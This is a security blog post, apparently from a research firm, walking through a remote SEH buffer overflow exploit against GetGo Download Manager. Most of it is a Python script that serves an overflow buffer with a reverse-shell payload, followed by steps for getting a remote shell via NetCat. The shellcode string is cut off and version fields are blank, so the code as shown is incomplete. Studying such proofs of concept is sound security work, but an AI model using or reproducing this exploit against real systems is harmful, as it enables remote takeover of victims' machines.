Quantify Cyber Risk Now

header ads

GetGo Download Manager Version | Remote Buffer Overflow (SEH) | Lucideus Research

GetGo Download Manager is a fully featured free download manager with integrated web video downloader. It can increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability can restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple yet modern graphic user interface makes GetGo user friendly and easy to use.

GetGo Download Manager has a smart download engine that can intelligently segment the file using multiple threads to accelerate your downloads. GetGo Download Manager supports proxy servers, ftp, http and https protocols, firewalls, redirects, cookies and authorization.

Download Vulnerable Version : GetGo Download Manager Version:

Lab Environment
Attacker Machine: Kali linux 2017.3 with NetCat
Tested On: Windows XP SP3


Step 1: Setup listener on port 443, on attacking machine
run script GetGo.py on attacking machine

# python GetGo.py

import sys
import socket
import os
import time
host = ""
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
print "\n[+] listening on %d ..." % port
bz, addr = s.accept()
print "[+] connection accepted from %s" % addr[0]
junk = "A"*20
#jump 6
nseh = "\xeb\x06\x90\x90"          
#0x72d11f39 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ}
seh = "\x39\x1f\xd1\x72"                        

    #msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -b "\x00" -f c
#Payload size: 351 bytes

reverse = ("\xd9\xeb\xd9\x74\x24\xf4\x5f\x2b\xc9\xba\xbe\x91\xb4\x8e\xb1"
fill = "D"*(4055 - len(reverse))
payload = junk + nseh + seh + reverse + fill
buffer = payload + "\r"
buffer+= payload + "\r"
buffer+= payload + "\r\n"
print bz.recv(1000)
print "[+] sending buffer ok\n"

Step 3: Open app on victim machine and go to download ,select new, add http://attacker ip to URL
index.html to File Name and select OK

Step 4 :  Check Attacker machine, we get remote shell through NetCat

                                                                 POC VIDEO

Conclusion: The GetGo Download Manager should be updated to the Patched version of http://www.getgosoft.com/getgodm/thankyou and Firewall should be properly configured so that no attacker can access to your machine remotely. 

Post a comment